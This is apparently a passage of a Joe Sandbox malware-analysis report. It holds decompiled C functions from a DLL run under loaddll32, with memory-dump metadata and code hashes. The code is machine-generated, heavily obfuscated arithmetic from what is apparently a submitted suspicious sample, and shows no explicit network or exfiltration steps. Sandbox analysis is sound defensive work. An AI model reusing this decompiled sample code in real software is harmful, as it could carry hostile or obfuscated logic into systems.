            									__eflags =  *0x6d55d5a4 - ( *(_a8 + ( *_t362 & 0x0000ffff) * 2) & 0x0000ffff); // 0x0
            									if(__eflags != 0) {
            										L16:
            										__eflags =  *0x6d55d5d8 - 0x18c9;
            										if( *0x6d55d5d8 == 0x18c9) {
            											goto L6;
            										} else {
            											L17:
            											_t318 =  *0x6d55d5d4; // 0x0
            											 *0x6d55d58c = _v24 |  *(_v4 + 0x3454) | _a24;
            											 *((intOrPtr*)(_v8 + _a28)) =  *((intOrPtr*)(_v8 + _a28)) + _t371 % ( *(_t362 + _t318 * 4) & 0x0000ffff);
            											_t239 =  *(( *_t362 & 0x0000ffff) * 3 + _a20) & 0x000000ff;
            										}
            									} else {
            										goto L15;
            									}
            								}
            							} else {
            								 *(_v12 + ( *_t362 & 0x0000ffff) * 8) = 0x84 %  *(_v12 + ( *_t362 & 0x0000ffff) * 8);
            								_t276 = 0x3c;
            								 *0x6d55d5b0 = _t276 % (_v20 & 0x0000ffff);
            								 *0xcaa =  *0xcaa - 1;
            								asm("cdq");
            								_t62 =  *(_a28 + 0x744) %  *0x6d55d5a0;
            								__eflags = _t62;
            								 *((short*)(_a8 +  *0xcaa * 8)) = _t62;
            								L6:
            								_t374 = _v24;
            								L7:
            								_t298 = _a24;
            								goto L8;
            							}
            						}
            					}
            				} else {
            					 *0x6d55d588 = 0x16b8;
            					_t374 = _v24;
            					 *((intOrPtr*)(_a16 + (_t373 & 0x0000ffff) * 4)) =  *((intOrPtr*)(_a16 + (_t373 & 0x0000ffff) * 4)) + 0x1ee8;
            					_t298 = _a24;
            					_t286 =  *0x6d55d598; // 0x0
            					_t287 = 0x0000006a -  *((intOrPtr*)(_a20 + 8)) ^  *0x6d55d574;
            					_v25 = 0x6a;
            					 *(_t374 + _t286 * 8) =  *(_t374 + _t286 * 8) ^ _t298;
            					L8:
            					 *_t362 =  *_t362 + 1;
            					_t342 =  *((intOrPtr*)(_v4 + 0x1c + ( *_t362 & 0x0000ffff) * 8));
            					if(_t342 >= _t298) {
            						_t375 = _a24;
            						_t369 = _a12 ^ 0x000007db;
            						_t364 = _v16;
            						do {
            							_t255 =  *0x6d55d570; // 0x0
            							 *(_t255 + ( *_t364 & 0x0000ffff) * 4) = _t369;
            							_t256 = _t287 & 0x000000ff;
            							_t287 = _t287 - 1;
            							_t342 = _t342 + 1;
            							 *0x6d55d5e4 = _t256;
            						} while (_t342 >= _t375);
            						_t362 = _a32;
            						_t374 = _v24;
            						_v25 = _t287;
            					}
            					_t363 =  &(_t362[1]);
            					_t343 = _v20 & 0x0000ffff;
            					 *((intOrPtr*)(_a4 + 0x70 + ( *_t362 & 0x0000ffff) * 8)) =  *((intOrPtr*)(_a4 + 0x70 + ( *_t362 & 0x0000ffff) * 8)) + (0x00001b71 - _t343 -  *0x6d55d5a0 |  *(_a4 + ( *_t362 & 0x0000ffff) * 4));
            					 *((intOrPtr*)(_a40 + _t343 * 4)) = 0x1b99;
            					_t289 =  *0x6d55d5b8; // 0x0
            					_t367 =  *0x6d55d5ac; // 0x0
            					_t290 = _t289 - 1;
            					 *0x6d55d5b8 = _t290;
            					while(_t367 != 0x948) {
            						_t226 =  *0x6d55d5c8; // 0x0
            						asm("cdq");
            						_t290 =  *(_t226 + ( *_t363 & 0x0000ffff) * 8) / _t290;
            						_t229 = 4;
            						asm("cdq");
            						_t230 = _t229 /  *0x6d55d5d8;
            						 *0x6d55d5b8 = _t290;
            						__eflags = _t230 - 0xca2;
            						if(_t230 != 0xca2) {
            							_t302 = _a40;
            							__eflags =  *((intOrPtr*)(_t302 + _t367 * 4)) - _t230;
            							if( *((intOrPtr*)(_t302 + _t367 * 4)) >= _t230) {
            								L27:
            								 *0x6d55d57c = _t367;
            								 *0x6d55d5c0 =  *0x6d55d5c0 + 0xaa;
            								_t235 = (_v16[0xbeb] & 0x0000ffff) % 0x124f;
            								asm("cdq");
            								__eflags = _t235 % _t290;
            								_t290 = _t235 / _t290;
            								 *0x6d55d5b8 = _t290;
            							} else {
            								_t241 =  *0x6d55d5ac; // 0x0
            								__eflags =  *0x6d55d590 - _t241; // 0x0
            								if(__eflags == 0) {
            									goto L27;
            								}
            							}
            						} else {
            							_t242 =  *0x6d55d570; // 0x0
            							_t291 = _a12;
            							 *(_t242 + ( *_t363 & 0x0000ffff) * 4) = _t291;
            							asm("cdq");
            							_t245 =  *0x6d55d598; // 0x0
            							 *((short*)(_a8 + 0xa + _t245 * 8)) = 0x1000 % _t367;
            							_t246 =  *0x6d55d578; // 0x0
            							 *((intOrPtr*)(_a40 + _t246 * 4)) =  *((intOrPtr*)(_a40 + _t367 * 8));
            							_t248 = _v25 + 1;
            							_t308 =  *_t363 & 0x0000ffff;
            							_v25 = _t248;
            							_t363 = _t363 - 2;
            							asm("cdq");
            							 *0x6d55d5ac = ((_t248 & 0x000000ff) / _t291 |  *(_t374 + 0x14 + _t308 * 4)) -  *0x6d55d5ac;
            							_t363[0xcaa] = _t363[ *0xcaa] + 0xca2;
            							_t290 =  *0x6d55d5b8; // 0x0
            						}
            						_t367 = _t367 + 1;
            						__eflags = _t367;
            					}
            					L30:
            					_t239 =  *(( *_t363 & 0x0000ffff) * 3 + _a20) & 0x000000ff;
            				}
            				return _t239 + 4;
            			}

            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3fe980fde2beba3e22a16f980f392df891148e2d185dd2a5426662d3c9feca7e
            • Instruction ID: 39ab13582fb1eb93f7712a70c62c541e1bd4257b16c4e52cc107789d2250670a
            • Opcode Fuzzy Hash: 3fe980fde2beba3e22a16f980f392df891148e2d185dd2a5426662d3c9feca7e
            • Instruction Fuzzy Hash: 27D15776A09211CFDB05CF19C490A29B7F1FBCA308F16446EF986C7B91D7B4A851CB52
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E6D519CD2() {
            				signed int _t175;
            				signed int _t211;
            				void* _t225;
            				signed int _t226;
            				void* _t229;
            				void* _t230;
            				signed int _t232;
            				signed int _t237;
            				signed int _t239;
            				signed int _t240;
            				intOrPtr _t241;
            				intOrPtr _t242;
            				intOrPtr _t244;
            				intOrPtr _t247;
            				intOrPtr _t250;
            				intOrPtr _t252;
            				intOrPtr _t253;
            				signed int _t260;
            				signed int _t262;
            				void* _t265;
            				signed int _t269;
            				intOrPtr _t274;
            				void* _t277;
            				void* _t280;
            				signed int _t282;
            				signed int _t285;
            				void* _t286;
            				intOrPtr* _t287;
            				intOrPtr _t288;
            				void* _t289;
            				void* _t290;
            
            				_t241 =  *((intOrPtr*)(_t290 + 0x2c));
            				_t288 =  *((intOrPtr*)(_t290 + 0x2c));
            				_t269 =  *((intOrPtr*)(_t290 + 0x18)) + 0xb56;
            				_t286 = _t241 + 0x505;
            				 *((intOrPtr*)(_t290 + 0x38)) =  *((intOrPtr*)(_t290 + 0x14)) + 0x977;
            				_t242 = _t241 + 0xfffff946;
            				 *((intOrPtr*)(_t290 + 0x24)) = _t242;
            				_t237 = _t288 + 0x616;
            				if(_t269 < _t242 + 0xa7f) {
            					L37:
            					return  *((intOrPtr*)(_t290 + 0x18)) + 0x81;
            				}
            				if( *((intOrPtr*)(_t290 + 0x2c)) + 0x2c4 > _t286 + 0x2de) {
            					_t244 =  *((intOrPtr*)(_t290 + 0x2c));
            					_t282 =  *(_t244 + 0x3c);
            					if(_t286 >= _t282 *  *(_t290 + 0x3c)) {
            						if(_t286 >  *((intOrPtr*)(_t244 + 0x13c)) -  *((intOrPtr*)(_t244 + 0xbc)) &&  *((intOrPtr*)(_t244 + 0x80)) >= (_t269 & 0x00002c90) - _t288) {
            							 *(_t244 + 0xd0) = ( *((intOrPtr*)(_t290 + 0x1c)) + 0xffffdd6e) *  *(_t244 + 0xd0);
            						}
            					} else {
            						if(_t286 !=  *(_t244 + 0xe8) * _t237) {
            							 *(_t244 + 0xd0) =  *(_t244 + 0xd0) - ( *(_t244 + 0x1c) |  *(_t244 + 0x10));
            						} else {
            							_t175 = ( *((intOrPtr*)(_t244 + 0x148)) -  *((intOrPtr*)(_t244 + 0xf8))) *  *(_t244 + 0x158) * 0x2ac3;
            							 *(_t244 + 0x158) = _t175;
            							 *((intOrPtr*)(_t244 + 0x74)) =  *((intOrPtr*)(_t244 + 0x74)) - (_t175 -  *((intOrPtr*)(_t290 + 0x28)) | 0x00002ac3);
            							 *(_t244 + 0x2c) =  *(_t244 + 0x2c) | _t282 ^ _t237;
            						}
            					}
            					L36:
            					goto L37;
            				}
            				_t287 =  *((intOrPtr*)(_t290 + 0x2c));
            				_t285 = 0x2b78;
            				 *(_t287 + 0x11c) =  *((intOrPtr*)(_t287 + 0x40)) -  *((intOrPtr*)( *((intOrPtr*)(_t287 + 0x70)) + 0x34));
            				_t247 =  *((intOrPtr*)(_t287 + 0x124));
            				 *(_t287 + 0x148) =  *(_t287 + 0x148) |  *((intOrPtr*)(_t287 + 0x24)) - 0x00001e7b;
            				 *((intOrPtr*)(_t287 + 0x190)) =  *((intOrPtr*)(_t287 + 0x190)) + 0x484c;
            				_t23 = _t247 + 0x1d4; // 0x32333dc0
            				 *(_t287 + 0x30) =  *(_t287 + 0x30) + 0xffffd488 -  *_t23;
            				if( *(_t287 + 0x11c) == 0) {
            					L23:
            					 *(_t287 + 0x158) =  *(_t287 + 0x148) | _t285;
            					 *(_t287 + 0x108) = _t287 + 0x94;
            					if( *((intOrPtr*)( *_t287 + 0x4c)) + 0x56d < _t285) {
            						L25:
            						 *(_t287 + 0x28) =  *(_t287 + 0x30) * 0x21e9;
            						 *( *(_t287 + 0x108)) =  *( *((intOrPtr*)(_t287 + 0x50)) + 0x1c) ^ 0x6e724366;
            						_t250 =  *_t287;
            						if( *((intOrPtr*)(_t287 + 0x178)) != ( *(_t250 + 0x4c) ^ 0x00003bfe)) {
            							 *(_t287 + 0x1a8) =  *(_t287 + 0x1a8) ^  *((intOrPtr*)(_t287 + 0xc4)) - 0x00002ea5;
            						}
            						if( *((intOrPtr*)(_t287 + 0xd0)) !=  *(_t287 + 0x2c)) {
            							 *(_t287 + 0x158) =  *(_t287 + 0x158) + 0xffffd62f - _t250;
            						}
            						goto L36;
            					} else {
            						goto L24;
            					}
            					do {
            						L24:
            						 *((intOrPtr*)( *((intOrPtr*)(_t287 + 0x50)) + 0x28)) =  *((intOrPtr*)( *((intOrPtr*)(_t287 + 0x88)) + 0x30));
            						 *((intOrPtr*)( *((intOrPtr*)(_t287 + 0x88)) + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t287 + 0x88)) + 0x30)) - 1;
            						_t285 = _t285 + 1;
            					} while (_t285 <=  *((intOrPtr*)( *_t287 + 0x4c)) + 0x56d);
            					goto L25;
            				}
            				_t27 = _t247 + 0x4c; // 0xd4
            				_t289 = 0;
            				_t252 =  *((intOrPtr*)(_t287 + 0x70));
            				_t239 =  *_t27 ^ 0x00002608;
            				 *(_t290 + 0x10) = _t239;
            				 *((intOrPtr*)(_t290 + 0x14)) = _t252;
            				_t274 =  *((intOrPtr*)(_t252 + 0x78 + _t239 * 8)) +  *((intOrPtr*)(_t287 + 0x40));
            				 *(_t287 + 0x17c) =  *(_t287 + 0x2c) | 0x00001df3;
            				 *((intOrPtr*)(_t290 + 0x28)) = _t274;
            				if( *((intOrPtr*)(_t252 + 0x7c + _t239 * 8)) <= 0) {
            					goto L23;
            				} else {
            					goto L4;
            				}
            				do {
            					L4:
            					_t253 = _t274 + _t289;
            					 *((intOrPtr*)(_t290 + 0x24)) = _t253;
            					_t289 = _t289 + ( *(_t287 + 0x4c) ^ 0x00002605);
            					 *(_t290 + 0x34) =  *(_t290 + 0x34) & 0x00000000;
            					_t211 = ( *((intOrPtr*)(_t253 + 4)) - 8) /  *(_t287 + 0x1c) * 0x1d6f318a;
            					_t274 =  *((intOrPtr*)(_t290 + 0x28));
            					 *(_t290 + 0x30) = _t211;
            					 *(_t290 + 0x3c) = _t274 + _t289;
            					 *(_t287 + 0x28) = ( *(_t287 + 0x30) + 0x260d) *  *(_t287 + 0x28);
            					if(_t211 != 0) {
            						_t240 =  *(_t290 + 0x34);
            						do {
            							_t277 = 0x2ea5;
            							if( *( *((intOrPtr*)(_t287 + 0x50)) + 0x1c) * 0x888075be < 0x2ea5) {
            								L8:
            								_t260 =  *(_t287 + 0x1c);
            								_t289 = _t289 + (_t260 ^ 0x0000260f);
            								_t262 =  *(_t287 + 0x80) ^ 0x00000a0b;
            								 *(_t287 + 0x30) = (_t260 - 0x2749) *  *(_t287 + 0x30);
            								_t280 = ( *( *(_t290 + 0x3c) + _t240 * 2) & 0xfff) +  *((intOrPtr*)( *((intOrPtr*)(_t290 + 0x24))));
            								if(_t262 < 0x24ad) {
            									L12:
            									 *((intOrPtr*)( *((intOrPtr*)(_t287 + 0x50)) + 0x148)) =  *((intOrPtr*)(_t287 + 0x90));
            									 *((intOrPtr*)(_t287 + 0x90)) =  *((intOrPtr*)(_t287 + 0x90)) + 1;
            									_t225 = (( *( *(_t290 + 0x3c) + _t240 * 2) & 0x0000ffff) >> 0xc) - 1;
            									if(_t225 == 0) {
            										_t226 =  *(_t287 + 0x11e) & 0x0000ffff;
            										L19:
            										 *((intOrPtr*)( *((intOrPtr*)(_t287 + 0x40)) + _t280)) =  *((intOrPtr*)( *((intOrPtr*)(_t287 + 0x40)) + _t280)) + _t226;
            										goto L20;
            									}
            									_t229 = _t225 - 1;
            									if(_t229 == 0) {
            										_t226 =  *(_t287 + 0x11c) & 0x0000ffff;
            										goto L19;
            									}
            									_t230 = _t229 - 1;
            									if(_t230 == 0 || _t230 == 7) {
            										_t226 =  *(_t287 + 0x11c);
            										goto L19;
            									} else {
            										goto L20;
            									}
            								} else {
            									_t232 =  *(_t287 + 0xd4);
            									_t265 = _t262 + 0xffffdb54;
            									goto L10;
            									L10:
            									_t232 = _t232 ^  *(_t287 + 0x130) ^ _t285;
            									_t265 = _t265 - 1;
            									if(_t265 != 0) {
            										goto L10;
            									} else {
            										 *(_t287 + 0xd4) = _t232;
            										goto L12;
            									}
            								}
            							} else {
            								goto L7;
            							}
            							do {
            								L7:
            								_t277 = _t277 + 1;
            								 *((intOrPtr*)( *((intOrPtr*)(_t287 + 0x10)) + 0xbc)) =  *((intOrPtr*)(_t287 + 0x48)) - 0x29b2;
            							} while (_t277 <=  *( *((intOrPtr*)(_t287 + 0x50)) + 0x1c) * 0x888075be);
            							goto L8;
            							L20:
            							 *((intOrPtr*)(_t287 + 0x118)) =  *((intOrPtr*)(_t287 + 0x118)) + 0xffffd54d -  *((intOrPtr*)(_t287 + 0x90));
            							_t240 = _t240 + 1;
            						} while (_t240 <  *(_t290 + 0x30));
            						_t239 =  *(_t290 + 0x10);
            						_t274 =  *((intOrPtr*)(_t290 + 0x28));
            					}
            				} while (_t289 <  *((intOrPtr*)( *((intOrPtr*)(_t290 + 0x14)) + 0x7c + _t239 * 8)));
            				goto L23;
            			}

            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • Opcode ID: 24f600c790e6cec38eafd9f5c81d36b2b3e00042096111a770172eaaa30d09b4
            • Instruction ID: 126fb8440d4357ec58ffd42a062e2b034a9d1d24529d7d7c74cd11ac4e5ed17d
            • Opcode Fuzzy Hash: 24f600c790e6cec38eafd9f5c81d36b2b3e00042096111a770172eaaa30d09b4
            • Instruction Fuzzy Hash: A1B117716087018FD368CF38C984A96B7E1FF88308F544A6EE5AA8BB51D731E946CF51
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 92%
            			E6D501C6E(signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24, signed int _a28, signed int _a32) {
            				signed int _v4;
            				signed int _v8;
            				intOrPtr _v12;
            				signed int _v16;
            				signed int _v20;
            				signed int _t153;
            				signed int _t158;
            				signed int _t160;
            				intOrPtr _t161;
            				intOrPtr _t168;
            				signed int _t172;
            				signed int _t180;
            				intOrPtr _t193;
            				signed int _t195;
            				signed int _t196;
            				signed int* _t200;
            				signed int* _t222;
            				signed char _t224;
            				signed int _t227;
            				signed int _t228;
            				signed int _t229;
            				signed int _t230;
            				signed char _t233;
            				signed int _t237;
            				intOrPtr _t239;
            				signed int _t240;
            				signed int _t244;
            				signed int _t249;
            				signed int _t252;
            				signed int _t257;
            				signed char _t258;
            				signed int _t262;
            				signed int _t263;
            				intOrPtr _t282;
            				void* _t283;
            				void* _t284;
            				signed int _t285;
            				signed int _t286;
            				intOrPtr _t287;
            				signed int* _t290;
            				signed int _t293;
            				void* _t302;
            				void* _t305;
            
            				_t153 =  *0x6d55d5c0; // 0x0
            				_t224 = _a12 & 0x00001011;
            				_v4 = _t153 & _a4 & 0x0000ffff;
            				_t285 =  *0x6d55d5dc; // 0x0
            				_v8 = _a28 & 0x000000ff;
            				_t282 =  *0x6d55d57c; // 0x0
            				_t6 = _t285 - 0x1cc; // -460
            				_v20 = 0x1efe;
            				_v12 = _t6;
            				_t283 = _t282 + 0xf22;
            				_t158 =  *0x6d55d598; // 0x0
            				_t257 = _t158 + _a4 & 0x0000ffff;
            				_t160 =  *0x6d55d5b4; // 0x0
            				_a28 = _t160;
            				_t161 =  *0x6d55d5a8; // 0x0
            				_v16 = _t257;
            				_t229 =  *(_t161 + 0x173e8);
            				if(_t229 >= 0x426) {
            					_t222 = (_t229 << 4) + _a20;
            					do {
            						 *_t222 =  *_t222 | 0x00002dd8;
            						_t229 = _t229 + 1;
            						_t222 =  &(_t222[4]);
            					} while (_t229 >= 0x426);
            					_t285 =  *0x6d55d5dc; // 0x0
            				}
            				_t293 = _a8;
            				if(_t285 < 0x190c) {
            					do {
            						 *(( *0x6d55d5c0 & 0x0000ffff) + _t293) =  *(_t293 + _t285 * 2) ^ _t224 ^ 0x00000024;
            						asm("cdq");
            						 *0x6d55d5d8 =  *0x6d55d5d8 ^ 0x0000161b % _t285;
            						_t285 = _t285 + 1;
            					} while (_t285 < 0x190c);
            					_t257 = _v16;
            				}
            				_t230 = _a16 & 0x000000ff;
            				_t258 = _t257 + 0xffff;
            				_t286 = _a20;
            				 *0x6d55d580 = _t230 -  *0x6d55d580;
            				_v16 = _t258;
            				_a8 = _t258 & 0x000000ff;
            				 *(_t286 + _t230 * 4) = 0x888 /  *(_t286 + _t230 * 4);
            				_t233 = _a4 + 0xffff;
            				_t262 = _t233 & 0x0000ffff;
            				_t168 =  *0x6d55d594; // 0x0
            				 *(_t262 + _t293) =  *(_t262 + _t293) + (_t233 & 0x000000ff) * ( *0x6d55d578 & 0x000000ff) -  *((intOrPtr*)(_t168 + 0xd54));
            				 *0x6d55d578 =  *0x6d55d578 + 1;
            				 *(_t262 + _t293) =  *(_t262 + _t293) & (_t224 - 0x0000004d |  *(_v12 + 0x17240));
            				_t237 =  *0x6d55d598; // 0x0
            				 *0x6d55d598 = _t237 + 1;
            				if( *((intOrPtr*)(_t286 + _t237 * 4)) != 0x2e48) {
            					L9:
            					_t302 =  *0x6d55d5c4 - 0x648; // 0x0
            					if(_t302 == 0) {
            						goto L10;
            					}
            				} else {
            					_v20 = 0x1efd;
            					if( *((intOrPtr*)(_t286 + 0x7bf4)) >= 0x1bd4) {
            						L10:
            						asm("cdq");
            						 *0x6d55d578 =  *0x6d55d578 + 1;
            						 *0x6d55d5b4 =  *0x6d55d5b4 ^ 0x00000130;
            						_t228 =  *0x6d55d5e4; // 0x0
            						 *0x6d55d5d8 = (_a32 & 0x000000ff) %  *0x6d55d5d8;
            						if(_t228 != 0xe8c) {
            							_t249 = _t228 * _v20;
            							_t200 = _t286 + _a12 * 4;
            							_a4 = _t200;
            							_a16 = 0x128a - _t283;
            							_t290 = _t200;
            							_a12 = _t249;
            							do {
            								 *0x6d55d5d4 = 0x1e24 -  *0x6d55d5d4;
            								 *0x6d55d58c = _t249 %  *0x6d55d58c;
            								_t305 =  *((intOrPtr*)(_v12 + _t228 * 4)) -  *0x6d55d5dc; // 0x0
            								if(_t305 >= 0) {
            									_a28 = _a28 + 1;
            								} else {
            									asm("cdq");
            									asm("cdq");
            									_t252 = _a16;
            									 *(_t293 + (_a24 & 0x000000ff) * 2) = 0xca1 /  *0x6d55d5d8 / ( *(_t293 + (_a24 & 0x000000ff) * 2) & 0x000000ff);
            									_t290 = _a4;
            									asm("cdq");
            									_t283 = _t283 + 1;
            									_a16 = _t252 - 1;
            									_t249 = _a12;
            									 *0x6d55d5e0 = (_v16 & 0x0000ffff & _t252) /  *0x6d55d5e0;
            								}
            								_t249 = _t249 + _v20;
            								_a12 = _t249;
            								_t228 = _t228 + 1;
            								 *_t290 = 0xfffffbe9 /  *_t290;
            							} while (_t228 != 0xe8c);
            							_t286 = _a20;
            						}
            					} else {
            						goto L9;
            					}
            				}
            				_t263 =  *0x6d55d578; // 0x0
            				_t239 =  *0x6d55d5c8; // 0x0
            				_t172 =  *0x6d55d5b4; // 0x0
            				 *((intOrPtr*)(_t239 + _t263 * 4)) = _t172 -  *((intOrPtr*)(_t239 + _t263 * 4));
            				 *0x6d55d578 =  *0x6d55d578 - 1;
            				_t240 = _a28 & 0x000000ff;
            				 *(_t286 + 0xb920) = _a8 &  *0x6d55d58c;
            				_a4 = _t240;
            				_t180 =  *0x6d55d5d4; // 0x0
            				 *0x6d55d5b0 = (_v4 & 0x0000ffff | _t240) %  *0x6d55d5b0;
            				_a16 = _t180;
            				asm("cdq");
            				_t244 =  *0x6d55d5dc; // 0x0
            				_t284 = _t283 - 1;
            				_t227 = _t244;
            				_a20 = 0xe72 / ( *((intOrPtr*)(_v8 + _t180 * 4)) + _v20);
            				if(_t227 > _t284) {
            					_t195 =  *0x6d55d5cc; // 0x0
            					asm("cdq");
            					_a28 = 0x1d1e;
            					_t196 = _t195 / _a28;
            					do {
            						_t244 = _t244 ^ _t196;
            						_t227 = _t227 + 1;
            						_t284 = _t284 - 1;
            					} while (_t227 > _t284);
            					 *0x6d55d5dc = _t244;
            				}
            				 *0x6d55d59c = 0xa90 -  *0x6d55d59c;
            				 *((intOrPtr*)(_t286 + _a16 * 8)) = 0x761 -  *((intOrPtr*)(_t286 + _a16 * 8));
            				 *((intOrPtr*)(_v12 + _a20 * 4)) =  *(_v12 + _a20 * 4) & 0x00000000;
            				_t287 =  *0x6d55d5a0; // 0x0
            				 *0x6d55d58c = (_a32 & 0x000000ff) %  *0x6d55d58c;
            				 *(_t287 + _t293) = (_a4 &  *0x6d55d5b8) / ( *(_t287 + _t293) & 0x000000ff);
            				_t193 =  *0x6d55d5bc; // 0x0
            				return  *((intOrPtr*)(_t193 + 0x1448));
            			}

            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • Opcode ID: b65f0892f4ac0bbe1ffa96c700450fabc1c23dbc965db4980c9d18329633df1f
            • Instruction ID: 2d5baa9e7ac4a42bb7031cc409ad0f3634082489f57db9baafc5eddb2c6df6d4
            • Opcode Fuzzy Hash: b65f0892f4ac0bbe1ffa96c700450fabc1c23dbc965db4980c9d18329633df1f
            • Instruction Fuzzy Hash: EFA14A725083918FCB1ACF29C090666BBF1FBCA308F56496EE886C7751D774A941CF52
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 94%
            			E6D515CA6() {
            				signed short _t181;
            				signed int* _t182;
            				signed int _t184;
            				signed short _t186;
            				signed int _t193;
            				signed int _t194;
            				signed int _t197;
            				signed int _t203;
            				intOrPtr _t208;
            				signed int _t210;
            				signed int _t212;
            				signed int _t219;
            				intOrPtr _t222;
            				signed short _t225;
            				signed int _t235;
            				intOrPtr _t236;
            				intOrPtr _t237;
            				intOrPtr _t247;
            				intOrPtr _t249;
            				signed int _t272;
            				void* _t274;
            				intOrPtr _t275;
            				signed int _t278;
            				intOrPtr _t279;
            				intOrPtr _t283;
            				signed int _t284;
            				signed int _t285;
            				intOrPtr _t286;
            				signed int _t292;
            				signed int _t293;
            				signed char _t298;
            				intOrPtr _t304;
            				signed char _t318;
            				signed char* _t329;
            				signed int _t332;
            				signed short _t333;
            				signed int _t337;
            				signed int _t339;
            				signed int* _t343;
            				signed int _t346;
            				intOrPtr _t347;
            				void* _t349;
            				void* _t355;
            
            				_t181 =  *0x6d55d5cc; // 0x0
            				_t275 =  *((intOrPtr*)(_t349 + 0x24));
            				_t182 = _t181 + 1;
            				 *0x6d55d5cc = _t182;
            				 *(_t349 + 0x10) = _t182;
            				_t272 =  *(_t349 + 0x4c);
            				_t339 =  *0x6d55d5d4; // 0x0
            				 *(_t349 + 0x14) =  *(_t275 + _t272 + 1) & 0x000000ff;
            				_t184 =  *0x6d55d5d8; // 0x0
            				 *(_t349 + 0xc) = _t184;
            				_t186 =  *(_t349 + 0x58) + 1;
            				 *(_t349 + 0x58) = _t186;
            				_t346 = _t186 & 0x0000ffff ^  *( *((intOrPtr*)(_t349 + 0x2c)) + 0x76b0);
            				 *((intOrPtr*)(_t349 + 0x24)) = 0x1a04 -  *((intOrPtr*)( *(_t349 + 0x40) + 0x62dc));
            				 *(_t349 + 0x28) = _t346;
            				 *(_t349 + 0x14) =  *((intOrPtr*)( *(_t349 + 0x40) + _t339 * 4)) + 0x1068;
            				_t193 =  *0x6d55d5ac; // 0x0
            				 *(_t349 + 0x40) = _t193;
            				_t194 =  *0x6d55d57c; // 0x0
            				_t332 =  *( *((intOrPtr*)(_t349 + 0x48)) + _t194 * 2) & 0x0000ffff;
            				if(_t332 <= 0x36f) {
            					_t333 =  *(_t349 + 0x20);
            					L5:
            					_t304 =  *0x6d55d5a8; // 0x0
            					_t197 =  *0x6d55d5a0; // 0x0
            					 *0x6d55d574 = ( *(_t304 + _t197 * 4) & 0x00001629 /  *0x6d55d58c * 0x00001aa5) /  *0x6d55d574;
            					_t278 =  *0x6d55d578; // 0x0
            					 *(_t349 + 0x40) =  *(_t349 + 0x40) |  *( *(_t349 + 0x10) + 0x20 + _t272 * 4);
            					_t203 =  *0x6d55d590; // 0x0
            					_t279 =  *0x6d55d594; // 0x0
            					_t347 =  *((intOrPtr*)(_t349 + 0x3c));
            					 *0x6d55d584 = (_t203 * _t339 /  *(_t346 + 0x14 + _t278 * 4) &  *(_t279 +  *(_t349 + 0x38) * 4)) /  *0x6d55d584;
            					_t208 =  *0x6d55d5c8; // 0x0
            					if( *((intOrPtr*)(_t208 + ( *0x6d55d59c & 0x0000ffff) * 4)) == ( *0x6d55d5d0 & 0x0000ffff)) {
            						L13:
            						_t210 =  *0x6d55d5b8; // 0x0
            						asm("cdq");
            						 *( *(_t349 + 0x14) +  *(_t349 + 0x40) * 4) = _t210 %  *( *(_t349 + 0x14) +  *(_t349 + 0x40) * 4);
            						_t212 =  *0x6d55d5a0; // 0x0
            						 *( *(_t349 + 0x4c) + _t272) =  *( *(_t349 + 0x4c) + _t272) &  *( *((intOrPtr*)(_t349 + 0x48)) + _t212 * 2);
            						_t283 =  *0x6d55d5a8; // 0x0
            						_t284 =  *(_t349 + 0x38);
            						 *(_t272 * 0xc +  *((intOrPtr*)(_t349 + 0x44))) = (( *( *((intOrPtr*)(_t349 + 0x18)) + 0x363) & 0x000000ff) /  *(_t283 + _t272 * 4) | 0x00000147) *  *(_t272 * 0xc +  *((intOrPtr*)(_t349 + 0x44)));
            						_t219 =  *0x6d55d578; // 0x0
            						if( *((intOrPtr*)( *((intOrPtr*)(_t349 + 0x50)) + _t219 * 4)) == _t284) {
            							 *((char*)(_t284 * 3 + _t347)) =  *((char*)(_t284 * 3 + _t347)) + 0x58;
